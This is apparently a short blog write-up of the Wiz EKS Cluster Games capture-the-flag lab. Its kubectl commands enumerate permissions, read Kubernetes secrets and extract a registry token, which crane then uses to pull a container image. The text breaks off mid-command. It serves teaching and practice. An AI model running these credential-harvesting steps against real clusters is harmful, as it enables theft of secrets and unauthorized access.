WIZ EKS Cluster Games Challenges

n00๐Ÿ”‘
5 min readFeb 18, 2024

CTF Link: https://eksclustergames.com/

Challenge 1 โ€” Secret Seeker

kubectl whoami

kubectl auth can-i --list

kubectl get secrets

kubectl get secret log-rotate -o json

Challenge 2 โ€” Registry Hunt

kubectl whoami

kubectl auth can-i --list

kubectl get pods
#database-pod-2c9b3a4e

kubectl get pod database-pod-2c9b3a4e -o yaml
#registry-pull-secrets-780bab1d

kubectl get secret registry-pull-secrets-780bab1d -o yaml
#eksclustergames:dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo

crane auth login docker.io -u eksclustergames -p "dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo"

crane pull docker.io/eksclustergames/base_ext_image:latestโ€ฆ

--

--

n00๐Ÿ”‘
n00๐Ÿ”‘

Written by n00๐Ÿ”‘

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u

No responses yet